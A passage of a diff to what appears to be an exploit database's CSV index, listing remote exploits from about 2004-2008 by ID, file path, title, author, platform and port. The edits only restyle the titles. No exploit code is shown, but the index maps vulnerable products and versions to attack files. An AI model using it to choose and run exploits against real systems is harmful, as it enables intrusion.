- Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 @@ -9833,25 +9838,25 @@ id,file,description,date,author,platform,type,port 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 -2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 -2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 -2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 +2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 +2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 +2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 -2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0 -2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 +2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - 'smbclient' Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0 +2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2809,platforms/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0 -2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 +2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 -2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 +2858,platforms/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69 -2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 +2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - ActiveX Control Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Long Filename' Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 -2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 +2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - 'KBIND' Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21 2951,platforms/multiple/remote/2951.sql,"Oracle 9i/10g - 'extproc' Local/Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 2959,platforms/linux/remote/2959.sql,"Oracle 9i/10g - 'utl_file' FileSystem Access Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 @@ -9860,13 +9865,13 @@ id,file,description,date,author,platform,type,port 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 -3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 -3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0 +3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - ActiveX Control Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 +3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0 3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25 3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0 3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting",2007-01-03,MoAB,osx,remote,0 -3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 +3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - 'acroreader' Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 @@ -9884,21 +9889,21 @@ id,file,description,date,author,platform,type,port 3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",windows,remote,6503 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 3244,platforms/windows/remote/3244.py,"CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow",2007-02-01,"Winny Thomas",windows,remote,1900 -3264,platforms/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 -3265,platforms/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 +3264,platforms/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 +3265,platforms/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection",2007-02-05,bunker,multiple,remote,0 3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution",2007-02-06,"Marco Ivaldi",windows,remote,3306 -3279,platforms/windows/remote/3279.html,"Alibaba Alipay - (Remove ActiveX) Remote Code Execution",2007-02-06,cocoruder,windows,remote,0 +3279,platforms/windows/remote/3279.html,"Alibaba Alipay - Remove ActiveX Remote Code Execution",2007-02-06,cocoruder,windows,remote,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,windows,remote,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 -3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow",2007-02-12,defsec,windows,remote,0 +3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,windows,remote,0 3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 3319,platforms/windows/remote/3319.pl,"MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 -3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String",2007-02-18,fuGich,linux,remote,110 -3335,platforms/windows/remote/3335.pm,"Ipswitch WS_FTP Server 5.05 - (XMD5) Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 +3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - 'pop3' Remote Format String",2007-02-18,fuGich,linux,remote,110 +3335,platforms/windows/remote/3335.pm,"Ipswitch WS_FTP Server 5.05 - XMD5 Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - 'location.hostname' Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 3358,platforms/multiple/remote/3358.pl,"Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 3359,platforms/multiple/remote/3359.pl,"Oracle 10g - KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 @@ -9913,12 +9918,12 @@ id,file,description,date,author,platform,type,port 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 3389,platforms/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0 -3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0 +3395,platforms/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0 3397,platforms/windows/remote/3397.pl,"MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 < 4.4.6 - 'PHPinfo()' Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0 3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote,0 3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote,0 -3425,platforms/multiple/remote/3425.txt,"mod_security 2.1.0 - (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 +3425,platforms/multiple/remote/3425.txt,"mod_security 2.1.0 - ASCIIZ byte POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,windows,remote,0 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,windows,remote,0 @@ -9930,14 +9935,14 @@ id,file,description,date,author,platform,type,port 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 -3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 +3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Updates Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit",2007-03-23,"Jon Hart",multiple,remote,0 3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0 -3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - (PASS) Remote Exploit",2007-03-26,"Winny Thomas",windows,remote,21 +3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Exploit",2007-03-26,"Winny Thomas",windows,remote,21 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 @@ -9972,7 +9977,7 @@ id,file,description,date,author,platform,type,port 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0 -3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - (exec-shield) 'proxy.c logurl()' Remote Overflow",2007-05-02,Xpl017Elz,linux,remote,0 +3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow",2007-05-02,Xpl017Elz,linux,remote,0 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 @@ -9984,7 +9989,7 @@ id,file,description,date,author,platform,type,port 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0 -3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080 +3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - 'exec-shield' GET Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113 3927,platforms/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote,0 3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote,0 @@ -10003,7 +10008,7 @@ id,file,description,date,author,platform,type,port 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 -4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 +4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - IMAP FLAGS Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Exploit",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,windows,remote,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote,0 @@ -10021,7 +10026,7 @@ id,file,description,date,author,platform,type,port 4061,platforms/windows/remote/4061.html,"Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",windows,remote,0 4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote,0 4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote,0 -4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - (EXEC) Remote Command Execution",2007-06-21,clarity_,linux,remote,0 +4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - 'EXEC' Remote Command Execution",2007-06-21,clarity_,linux,remote,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - Exploit",2007-06-25,shinnai,windows,remote,0 @@ -10031,7 +10036,7 @@ id,file,description,date,author,platform,type,port 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - 'AmxVnc.dll 1.0.13.0' Buffer Overflow",2007-06-28,rgod,windows,remote,0 4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Buffer Overflow",2007-07-03,shinnai,windows,remote,0 4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow",2007-07-03,Heretic2,windows,remote,5151 -4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote Overwrite (SEH)",2007-07-06,h07,windows,remote,0 +4152,platforms/windows/remote/4152.py,"ViRC 2.0 - JOIN Response Remote Overwrite (SEH)",2007-07-06,h07,windows,remote,0 4155,platforms/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' Exploit",2007-07-06,shinnai,windows,remote,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 @@ -10063,7 +10068,7 @@ id,file,description,date,author,platform,type,port 4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - 'CkString.dll 1.1 SaveToFile()' Insecure Method",2007-08-05,shinnai,windows,remote,0 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 -4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 +4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 @@ -10103,26 +10108,26 @@ id,file,description,date,author,platform,type,port 4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Buffer Overflow",2007-09-23,rgod,windows,remote,0 -4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 +4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 4452,platforms/windows/remote/4452.html,"Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",windows,remote,0 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - 'EBCRYPT.dll 2.0' Multiple Remote Vulnerabilities",2007-09-24,shinnai,windows,remote,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4478,platforms/linux/remote/4478.c,"smbftpd 0.96 - SMBDirList-function Remote Format String",2007-10-01,"Jerry Illikainen",linux,remote,21 -4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 - (HELP) Remote Buffer Overflow",2007-10-04,weak,windows,remote,0 +4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow",2007-10-04,weak,windows,remote,0 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,linux,remote,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 -4530,platforms/multiple/remote/4530.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 +4530,platforms/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat - WebDAV Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 4556,platforms/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616 4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,multiple,remote,0 @@ -10143,10 +10148,10 @@ id,file,description,date,author,platform,type,port 4715,platforms/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80 -4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - (Goahead 